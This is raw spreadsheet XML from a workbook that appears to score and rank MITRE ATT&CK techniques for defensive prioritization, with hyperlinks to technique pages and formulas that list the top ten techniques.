Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/001" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1611" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1559/001" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/002" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/003" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/001" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/006" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/003" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/002" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/003" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/002" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/001" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1610" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036/006" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/003" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/014" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098/003" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/002" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/007" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1111" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/002" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550/001" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/005" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/002" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/004" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/006" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/006" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/002" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1580" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/002" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/002" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585/002" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/002" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1589/002" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/004" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/014" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1596/002" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/003" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1534" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/003" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/005" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/014" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/005" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/001" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542/001" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102/002" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/001" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/002" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/004" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/009" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/002" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/003" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1496" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1176" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137/004" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/001" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1548/003" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1606/002" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/010" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1490" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1598/003" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1526" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/002" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1531" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1609" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1221" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1092" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587/004" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1591/004" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/003" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1555" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/002" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/0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DE0A5-6254-8D47-8EC2-57C5290A713E}">
  <dimension ref="A1:E18"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B18" sqref="B18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.875" defaultRowHeight="15.95"/>
  <cols>
    <col min="1" max="1" width="21.625" style="48" customWidth="1"/>
    <col min="2" max="2" width="83" style="48" customWidth="1"/>
    <col min="3" max="16384" width="10.875" style="48"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="144.94999999999999" customHeight="1">
      <c r="A1" s="70" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="70"/>
      <c r="C1" s="49"/>
      <c r="D1" s="49"/>
      <c r="E1" s="49"/>
    </row>
    <row r="2" spans="1:5" ht="20.100000000000001" customHeight="1">
      <c r="A2" s="69" t="s">
        <v>1</v>
      </c>
      <c r="B2" s="69"/>
    </row>
    <row r="3" spans="1:5" ht="36" customHeight="1">
      <c r="A3" s="48" t="s">
        <v>2</v>
      </c>
      <c r="B3" s="48" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" spans="1:5" ht="20.100000000000001" customHeight="1">
      <c r="A5" s="69" t="s">
        <v>4</v>
      </c>
      <c r="B5" s="69"/>
    </row>
    <row r="6" spans="1:5" ht="51">
      <c r="A6" s="48" t="s">
        <v>5</v>
      </c>
      <c r="B6" s="48" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:5" ht="17.100000000000001">
      <c r="A7" s="48" t="s">
        <v>7</v>
      </c>
      <c r="B7" s="48" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:5" ht="33.950000000000003">
      <c r="A8" s="48" t="s">
        <v>9</v>
      </c>
      <c r="B8" s="48" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="9" spans="1:5" ht="33.950000000000003">
      <c r="A9" s="48" t="s">
        <v>11</v>
      </c>
      <c r="B9" s="48" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="11" spans="1:5" ht="18.95">
      <c r="A11" s="69" t="s">
        <v>13</v>
      </c>
      <c r="B11" s="69"/>
    </row>
    <row r="12" spans="1:5" ht="51">
      <c r="B12" s="48" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" spans="1:5" ht="18.95">
      <c r="A14" s="69" t="s">
        <v>15</v>
      </c>
      <c r="B14" s="69"/>
    </row>
    <row r="15" spans="1:5" ht="17.100000000000001">
      <c r="B15" s="48" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="17" spans="1:2" ht="18.95">
      <c r="A17" s="69" t="s">
        <v>17</v>
      </c>
      <c r="B17" s="69"/>
    </row>
    <row r="18" spans="1:2" ht="221.1">
      <c r="B18" s="48" t="s">
        <v>18</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A17:B17"/>
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A5:B5"/>
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A11:B11"/>
    <mergeCell ref="A14:B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27978-445B-B940-9D99-F64F67CA40D8}">
  <dimension ref="A1:G19"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C15" sqref="C15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.95"/>
  <cols>
    <col min="1" max="1" width="44.5" customWidth="1"/>
    <col min="2" max="2" width="6.625" customWidth="1"/>
    <col min="3" max="3" width="36.625" customWidth="1"/>
    <col min="5" max="5" width="29.125" customWidth="1"/>
    <col min="6" max="6" width="9.625" customWidth="1"/>
    <col min="7" max="7" width="41" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="2" spans="1:7">
      <c r="A2" s="17" t="s">
        <v>20</v>
      </c>
      <c r="B2" s="18" t="s">
        <v>21</v>
      </c>
      <c r="C2" s="19" t="s">
        <v>22</v>
      </c>
      <c r="E2" s="41" t="s">
        <v>23</v>
      </c>
      <c r="F2" s="42" t="s">
        <v>21</v>
      </c>
      <c r="G2" s="43" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="3" spans="1:7">
      <c r="A3" s="20" cm="1">
        <f t="array" ref="A3:C12">_xlfn._xlws.SORT(_xlfn._xlws.FILTER(Methodology!B4:D581,Methodology!B4:B581&gt;=LARGE(Methodology!B4:B581,10)),1,-1)</f>
        <v>3.3030571428571429</v>
      </c>
      <c r="B3" t="str">
        <v>T1059</v>
      </c>
      <c r="C3" s="21" t="str">
        <v>Command and Scripting Interpreter</v>
      </c>
      <c r="E3" s="78" cm="1">
        <f t="array" ref="E3:G12">_xlfn._xlws.SORT(_xlfn._xlws.FILTER(_xlfn._xlws.FILTER(Methodology!A4:D581,Methodology!A4:A581&gt;=LARGE(Methodology!A4:A581,10)),{1,0,1,1}),1,-1)</f>
        <v>0.59351176014285723</v>
      </c>
      <c r="F3" t="str">
        <v>T1486</v>
      </c>
      <c r="G3" s="37" t="str">
        <v>Data Encrypted for Impact</v>
      </c>
    </row>
    <row r="4" spans="1:7">
      <c r="A4" s="20">
        <v>2.8151666666666668</v>
      </c>
      <c r="B4" t="str">
        <v>T1047</v>
      </c>
      <c r="C4" s="21" t="str">
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="E4" s="36">
        <v>0.52327508809523815</v>
      </c>
      <c r="F4" t="str">
        <v>T1490</v>
      </c>
      <c r="G4" s="37" t="str">
        <v>Inhibit System Recovery</v>
      </c>
    </row>
    <row r="5" spans="1:7">
      <c r="A5" s="20">
        <v>2.7170000000000001</v>
      </c>
      <c r="B5" t="str">
        <v>T1053</v>
      </c>
      <c r="C5" s="21" t="str">
        <v>Scheduled Task/Job</v>
      </c>
      <c r="E5" s="36">
        <v>0.48739639929771433</v>
      </c>
      <c r="F5" t="str">
        <v>T1027</v>
      </c>
      <c r="G5" s="37" t="str">
        <v>Obfuscated Files or Information</v>
      </c>
    </row>
    <row r="6" spans="1:7">
      <c r="A6" s="20">
        <v>2.2391190476190475</v>
      </c>
      <c r="B6" t="str">
        <v>T1055</v>
      </c>
      <c r="C6" s="21" t="str">
        <v>Process Injection</v>
      </c>
      <c r="E6" s="36">
        <v>0.4815166666666667</v>
      </c>
      <c r="F6" t="str">
        <v>T1047</v>
      </c>
      <c r="G6" s="37" t="str">
        <v>Windows Management Instrumentation</v>
      </c>
    </row>
    <row r="7" spans="1:7">
      <c r="A7" s="20">
        <v>2.1470000000000002</v>
      </c>
      <c r="B7" t="str">
        <v>T1543</v>
      </c>
      <c r="C7" s="21" t="str">
        <v>Create or Modify System Process</v>
      </c>
      <c r="E7" s="36">
        <v>0.46666666666666667</v>
      </c>
      <c r="F7" t="str">
        <v>T1059</v>
      </c>
      <c r="G7" s="37" t="str">
        <v>Command and Scripting Interpreter</v>
      </c>
    </row>
    <row r="8" spans="1:7">
      <c r="A8" s="20">
        <v>2.1090000000000004</v>
      </c>
      <c r="B8" t="str">
        <v>T1562</v>
      </c>
      <c r="C8" s="21" t="str">
        <v>Impair Defenses</v>
      </c>
      <c r="E8" s="36">
        <v>0.4386228571428572</v>
      </c>
      <c r="F8" t="str">
        <v>T1036</v>
      </c>
      <c r="G8" s="37" t="str">
        <v>Masquerading</v>
      </c>
    </row>
    <row r="9" spans="1:7">
      <c r="A9" s="20">
        <v>2.1022047619047619</v>
      </c>
      <c r="B9" t="str">
        <v>T1574</v>
      </c>
      <c r="C9" s="21" t="str">
        <v>Hijack Execution Flow</v>
      </c>
      <c r="E9" s="36">
        <v>0.43656666666666671</v>
      </c>
      <c r="F9" t="str">
        <v>T1562.001</v>
      </c>
      <c r="G9" s="37" t="str">
        <v>Impair Defenses</v>
      </c>
    </row>
    <row r="10" spans="1:7">
      <c r="A10" s="20">
        <v>2.0765333333333333</v>
      </c>
      <c r="B10" t="str">
        <v>T1218</v>
      </c>
      <c r="C10" s="21" t="str">
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="E10" s="36">
        <v>0.4315342857142857</v>
      </c>
      <c r="F10" t="str">
        <v>T1112</v>
      </c>
      <c r="G10" s="37" t="str">
        <v>Modify Registry</v>
      </c>
    </row>
    <row r="11" spans="1:7">
      <c r="A11" s="20">
        <v>1.9530160793666669</v>
      </c>
      <c r="B11" t="str">
        <v>T1021</v>
      </c>
      <c r="C11" s="21" t="str">
        <v>Remote Services</v>
      </c>
      <c r="E11" s="36">
        <v>0.39057857142857144</v>
      </c>
      <c r="F11" t="str">
        <v>T1055</v>
      </c>
      <c r="G11" s="37" t="str">
        <v>Process Injection</v>
      </c>
    </row>
    <row r="12" spans="1:7">
      <c r="A12" s="22">
        <v>1.9295742327666667</v>
      </c>
      <c r="B12" s="23" t="str">
        <v>T1003</v>
      </c>
      <c r="C12" s="24" t="str">
        <v>OS Credential Dumping</v>
      </c>
      <c r="E12" s="38">
        <v>0.38183037836895239</v>
      </c>
      <c r="F12" s="39" t="str">
        <v>T1204</v>
      </c>
      <c r="G12" s="40" t="str">
        <v>User Execution</v>
      </c>
    </row>
    <row r="14" spans="1:7">
      <c r="C14" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="15" spans="1:7">
      <c r="A15" t="s">
        <v>25</v>
      </c>
      <c r="B15" s="50" t="s">
        <v>26</v>
      </c>
      <c r="C15">
        <f>IF(B15="N",0.2*0.99,IF(B15="L", 0.2 * 0.66,IF(B15="M",0.2*0.33,IF(B15="H",0))))</f>
        <v>0.19800000000000001</v>
      </c>
    </row>
    <row r="16" spans="1:7">
      <c r="A16" t="s">
        <v>27</v>
      </c>
      <c r="B16" s="50" t="s">
        <v>28</v>
      </c>
      <c r="C16">
        <f t="shared" ref="C16:C19" si="0">IF(B16="N",0.2*0.99,IF(B16="L", 0.2 * 0.66,IF(B16="M",0.2*0.33,IF(B16="H",0))))</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" t="s">
        <v>29</v>
      </c>
      <c r="B17" s="50" t="s">
        <v>30</v>
      </c>
      <c r="C17">
        <f t="shared" si="0"/>
        <v>0.13200000000000001</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="A18" t="s">
        <v>31</v>
      </c>
      <c r="B18" s="50" t="s">
        <v>26</v>
      </c>
      <c r="C18">
        <f t="shared" si="0"/>
        <v>0.19800000000000001</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="A19" t="s">
        <v>32</v>
      </c>
      <c r="B19" s="50" t="s">
        <v>28</v>
      </c>
      <c r="C19">
        <f t="shared" si="0"/>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CDFD9-4E39-0040-BA61-27A0B135497C}">
  <dimension ref="A1:AU581"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A58" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="D68" sqref="D68"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.95"/>
  <cols>
    <col min="1" max="1" width="33.125" style="25" customWidth="1"/>
    <col min="2" max="2" width="19.125" style="30" customWidth="1"/>
    <col min="3" max="3" width="9.875" style="25" customWidth="1"/>
    <col min="4" max="5" width="26.5" style="25" customWidth="1"/>
    <col min="6" max="6" width="15.625" style="25" customWidth="1"/>
    <col min="7" max="7" width="14" style="25" customWidth="1"/>
    <col min="8" max="8" width="16.125" style="25" customWidth="1"/>
    <col min="9" max="12" width="26.5" hidden="1" customWidth="1"/>
    <col min="13" max="13" width="24.375" style="25" customWidth="1"/>
    <col min="14" max="14" width="11.375" style="26" customWidth="1"/>
    <col min="15" max="15" width="12.125" style="26" customWidth="1"/>
    <col min="16" max="16" width="14.375" style="26" customWidth="1"/>
    <col min="17" max="17" width="14.125" style="26" customWidth="1"/>
    <col min="18" max="18" width="26.5" style="27" customWidth="1"/>
    <col min="19" max="19" width="18.375" style="27" customWidth="1"/>
    <col min="20" max="20" width="34.125" style="27" customWidth="1"/>
    <col min="21" max="21" width="16.5" style="27" customWidth="1"/>
    <col min="22" max="22" width="17.125" style="30" customWidth="1"/>
    <col min="23" max="23" width="15.875" style="1" hidden="1" customWidth="1"/>
    <col min="24" max="24" width="26.5" style="1" hidden="1" customWidth="1"/>
    <col min="25" max="25" width="17.5" style="1" hidden="1" customWidth="1"/>
    <col min="26" max="26" width="15.125" style="1" hidden="1" customWidth="1"/>
    <col min="27" max="28" width="26.5" style="1" hidden="1" customWidth="1"/>
    <col min="29" max="29" width="47.875" style="25" customWidth="1"/>
    <col min="30" max="30" width="18" style="30" customWidth="1"/>
    <col min="31" max="31" width="18.125" style="30" hidden="1" customWidth="1"/>
    <col min="32" max="32" width="18.375" style="25" customWidth="1"/>
    <col min="33" max="33" width="18.375" style="25" hidden="1" customWidth="1"/>
    <col min="34" max="34" width="14.625" style="25" customWidth="1"/>
    <col min="35" max="35" width="14.625" style="25" hidden="1" customWidth="1"/>
    <col min="36" max="36" width="16.125" style="25" customWidth="1"/>
    <col min="37" max="37" width="16.125" style="25" hidden="1" customWidth="1"/>
    <col min="38" max="38" width="14.625" style="25" customWidth="1"/>
    <col min="39" max="39" width="14.625" style="25" hidden="1" customWidth="1"/>
